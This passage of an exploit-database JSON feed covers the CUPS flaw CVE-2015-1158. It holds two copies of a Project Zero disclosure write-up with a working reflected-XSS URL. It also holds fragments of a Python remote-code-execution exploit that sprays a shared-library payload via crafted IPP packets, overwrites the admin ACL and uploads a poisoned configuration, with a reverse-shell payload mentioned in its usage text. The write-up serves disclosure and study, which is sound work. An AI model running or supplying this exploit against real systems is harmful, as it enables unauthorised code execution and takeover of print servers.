opt in ('-f','--stomp-only'):\r\n noshell = 1;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n pretty(\"*\",\"locate available printer\")\r\n printer = locatePrinters(rhost, rport)\r\n pretty(\"*\",\"stomp ACL\")\r\n stompACL(rhost, rport, printer)\r\n if (noshell is not None):\r\n pretty(\"*\",\"fin\")\r\n exit(0)\r\n pretty(\"*\",\"prepare payload\")\r\n payload = preparePayload(libpath)\r\n pretty(\"*\",\"spray payload\")\r\n jobid = seedTarget(rhost, rport, printer, payload)\r\n pretty(\"*\",\"grab original config\")\r\n OG_config = getConfig(rhost, rport)\r\n pretty(\"*\",\"generate poison config\")\r\n evil_config = poisonConfig(OG_config, jobid)\r\n pretty(\"*\",\"upload poison config\")\r\n putConfig(rhost, rport, evil_config)\r\n pretty(\"*\",\"fin\")\r\n exit(0);\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26891"}, {"lastseen": "2017-12-31T21:02:32", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2015-06-23T00:00:00", "type": "zdt", "title": "CUPS 2.0.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2015-06-23T00:00:00", "id": "1337DAY-ID-23782", "href": "https://0day.today/exploit/description/23782", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\r\n \r\nAbstract\r\n \r\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. 
The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\r\n \r\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\r\n \r\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\r\n \r\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\r\n \r\nSummary\r\n \r\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\r\n \r\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. 
A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\r\n \r\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\r\nBackground\r\n \r\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\r\n \r\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\r\n \r\nscheduler/ipp.c:1626:\r\n \r\n /*\r\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\r\n */\r\n \r\n for (i = 0; i < attr->num_values; i ++)\r\n {\r\n _cupsStrFree(attr->values[i].string.text);\r\n attr->values[i].string.text = NULL;\r\n if (attr->values[i].string.language) \u2190 for all values in an attribute\r\n {\r\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\r\n attr->values[i].string.language = NULL;\r\n }\r\n }\r\n \r\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\r\n \r\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. 
For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\r\n \r\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\r\n \r\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\r\n \r\n \r\nA Reflected XSS in the Web Interface (CVE-2015-1159)\r\n \r\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\r\n \r\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\r\n \r\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\r\n<>\"'&\r\n \r\n These are replaced with their HTML entity equivalents ('<' etc...).\r\n \r\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\r\n \r\n if (*s == '<')\r\n {\r\n /*\r\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\r\n */\r\n \r\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\r\n {\r\n fputs(\"<A HREF=\\\"\", out);\r\n s += 9;\r\n \r\n while (*s && *s != '\\\"')\r\n {\r\n if (*s == '&')\r\n fputs(\"&\", out);\r\n else\r\n putc(*s, out);\r\n \r\n s ++;\r\n }\r\n \r\n if (*s)\r\n s ++;\r\n \r\n fputs(\"\\\">\", out);\r\n }\r\n \r\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. 
The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\r\n \r\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\r\n \r\nTake this example from templates/help-header.tmp:19:\r\n \r\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\r\n \r\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\r\n \r\nRequesting the following URI will demonstrate this reflected XSS:\r\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\r\n \r\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. 
As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\r\n \r\n \r\nUpstream Fixes\r\n \r\nApple Fix (April 16, 2015):\r\nhttps://support.apple.com/kb/DL1807\r\n \r\nOfficial CUPS fix for downstream vendors (June 8, 2015):\r\nhttps://www.cups.org/str.php?L4609\r\nhttp://www.cups.org/blog.php?L1082+I0+Q\r\n \r\nProject Zero Bug\r\n \r\nFor those interested, the sample exploit can be found here:\r\n \r\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz\r\n \r\nDisclosure Timeline\r\n \r\nMarch 20th, 2015 - Initial notification to Apple\r\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\r\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\r\nJune 18th, 2015 - Disclosure + 90 days\r\nJune 19th, 2015 - P0 publication\r\n \r\nAttack Surface Reduction in CUPS 2.0.3+\r\n \r\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\r\n \r\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\r\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\r\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\r\n \r\nAcknowledgements\r\n \r\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\r\n \r\nConclusion\r\n \r\nNo one prints anything anymore anyways.\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23782"}], "exploitdb": [{"lastseen": "2016-02-04T05:36:17", "description": "CUPS < 2.0.3 - Multiple Vulnerabilities. CVE-2015-1158. 
Remote exploits for multiple platform", "published": "2015-06-22T00:00:00", "type": "exploitdb", "title": "CUPS < 2.0.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2015-06-22T00:00:00", "id": "EDB-ID:37336", "href": "https://www.exploit-db.com/exploits/37336/", "sourceData": "Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html\r\n\r\nAbstract\r\n\r\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\r\n\r\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\r\n\r\nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. 
Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\r\n\r\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\r\n\r\nSummary\r\n\r\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\r\n\r\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\r\n\r\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\r\nBackground\r\n\r\nImproper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\r\n\r\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. 
In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\r\n\r\nscheduler/ipp.c:1626:\r\n\r\n /*\r\n * Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\r\n */\r\n\r\n for (i = 0; i < attr->num_values; i ++)\r\n {\r\n _cupsStrFree(attr->values[i].string.text);\r\n attr->values[i].string.text = NULL;\r\n if (attr->values[i].string.language) \u2190 for all values in an attribute\r\n {\r\n _cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\r\n attr->values[i].string.language = NULL;\r\n }\r\n }\r\n\r\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\r\n\r\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\r\n\r\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\r\n\r\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\r\n\r\n\r\nA Reflected XSS in the Web Interface (CVE-2015-1159)\r\n\r\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\r\n\r\nThe template engine has 2 special cases for 'href' attributes from HTML links. 
The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\r\n\r\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\r\n<>\"'&\r\n\r\n These are replaced with their HTML entity equivalents ('<' etc...).\r\n\r\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\r\n\r\n if (*s == '<')\r\n {\r\n /*\r\n * Pass <A HREF=\"url\"> and </A>, otherwise quote it...\r\n */\r\n\r\n if (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\r\n {\r\n fputs(\"<A HREF=\\\"\", out);\r\n s += 9;\r\n\r\n while (*s && *s != '\\\"')\r\n {\r\n if (*s == '&')\r\n fputs(\"&\", out);\r\n else\r\n putc(*s, out);\r\n\r\n s ++;\r\n }\r\n\r\n if (*s)\r\n s ++;\r\n\r\n fputs(\"\\\">\", out);\r\n }\r\n\r\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\r\n\r\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\r\n\r\nTake this example from templates/help-header.tmp:19:\r\n\r\n <P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\r\n\r\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. 
The remainder of the 'QUERY' variable will be interpreted as HTML tags.\r\n\r\nRequesting the following URI will demonstrate this reflected XSS:\r\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\r\n\r\nThe 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\r\n\r\n\r\nUpstream Fixes\r\n\r\nApple Fix (April 16, 2015):\r\nhttps://support.apple.com/kb/DL1807\r\n\r\nOfficial CUPS fix for downstream vendors (June 8, 2015):\r\nhttps://www.cups.org/str.php?L4609\r\nhttp://www.cups.org/blog.php?L1082+I0+Q\r\n\r\nProject Zero Bug\r\n\r\nFor those interested, the sample exploit can be found here:\r\n\r\nhttps://code.google.com/p/google-security-research/issues/detail?id=455\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz\r\n\r\nDisclosure Timeline\r\n\r\nMarch 20th, 2015 - Initial notification to Apple\r\nApril 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\r\nJune 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\r\nJune 18th, 2015 - Disclosure + 90 days\r\nJune 19th, 2015 - P0 publication\r\n\r\nAttack Surface Reduction in CUPS 2.0.3+\r\n\r\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\r\n\r\nConfiguration value strings are now logically separated from the string pool, allocated by strdup() instead.\r\nLD_* and DYLD_* environment variables are blocked when CUPS is running as root.\r\nThe localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\r\n\r\nAcknowledgements\r\n\r\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\r\n\r\nConclusion\r\n\r\nNo one prints anything anymore anyways.", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37336/"}, {"lastseen": "2017-02-03T08:59:45", "description": "CUPS < 2.0.3 - Remote Command Execution. CVE-2015-1158. Remote exploit for Linux platform", "published": "2017-02-03T00:00:00", "type": "exploitdb", "title": "CUPS < 2.0.3 - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "id": "EDB-ID:41233", "href": "https://www.exploit-db.com/exploits/41233/", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\r\n# Google Dork: n/a\r\n# Date: 2/2/17\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: cups.org\r\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\r\n# Version: <2.0.3\r\n# Tested on: Ubuntu 14/15\r\n# CVE : CVE-2015-1158\r\nimport os, re, socket, random, time, getopt, sys\r\nfrom socket import *\r\nfrom struct import *\r\n\r\ndef banner():\r\n print '''\r\n lol ty google\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\ngithub.com/0x00string/oldays/CVE-2015-1158.py\r\n'''\r\n\r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target IPP service port\\n\"\r\n 
\" -c, --lib /path/to/payload.so\\n\"\r\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\r\n \"\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\r\n exit()\r\n\r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n\r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n\r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n\r\n return d\r\n\r\nclass tcpsock:\r\n def __init__(self, sock=None):\r\n if sock is None:\r\n self.sock = socket(\r\n AF_INET, SOCK_STREAM)\r\n self.sock.settimeout(30)\r\n else:\r\n self.sock = sock\r\n def connect(self, host, port):\r\n self.sock.connect((host, int(port)))\r\n def tx(self, msg):\r\n self.sock.send(msg)\r\n def rx(self):\r\n tmp = self.sock.recv(1024)\r\n msg = \"\"\r\n while tmp:\r\n msg += tmp\r\n tmp = self.sock.recv(1024)\r\n return msg\r\n\r\ndef txrx (ip, port, proto, txpacket):\r\n if (proto is \"tcp\"):\r\n sock = tcpsock()\r\n elif (proto is \"udp\"):\r\n sock = udpsock()\r\n else:\r\n return None\r\n sock.connect(ip, port)\r\n sock.tx(txpacket)\r\n rxpacket = sock.rx()\r\n return rxpacket\r\n\r\ndef 
locatePrinters(rhost, rport=\"631\"):\r\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n response = txrx(rhost, int(rport), \"tcp\", request)\r\n if response is not None:\r\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\r\n if m is not None:\r\n printer = m.group(1)\r\n pretty(\"+\",\"printer found: \" + printer)\r\n else:\r\n pretty(\"-\",\"no printers\")\r\n exit(1)\r\n return printer\r\n\r\ndef preparePayload(libpath):\r\n with open(libpath, 'rb') as f:\r\n payload = f.read()\r\n if payload is not None:\r\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\r\n else:\r\n pretty(\"-\",\"something went wrong\")\r\n usage()\r\n return payload\r\n\r\ndef seedTarget(rhost, rport, printer, payload):\r\n i = random.randint(1,3)\r\n reqid = str(pack(\">i\",(i+2)))\r\n reqid2 = str(pack(\">i\",(i+3)))\r\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\r\n\r\n create_job_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x05\"+\r\n reqid+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x02\"\r\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\r\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\r\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\r\n 
\"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\r\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\r\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x03\")\r\n pretty(\"*\",\"Sending createJob\")\r\n\r\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n createJobRequest = http_header1 + create_job_packet\r\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\r\n if blah is not None:\r\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\r\n if m is not None:\r\n jobid = m.group(1)\r\n else:\r\n pretty(\"-\",\"something went wrong\");\r\n exit()\r\n\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\", \"Sending sendJob\")\r\n\r\n send_document_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x06\"+\r\n reqid2+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\r\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\r\n \"\\x03\"+\r\n payload)\r\n\r\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: 
application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n sendJobRequest = http_header2 + send_document_packet\r\n blah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest)\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\",\"job id: \" + jobid)\r\n return jobid\r\n\r\ndef stompACL(rhost, rport, printer):\r\n i = random.randint(1,1024)\r\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\r\n\r\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+1)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n 
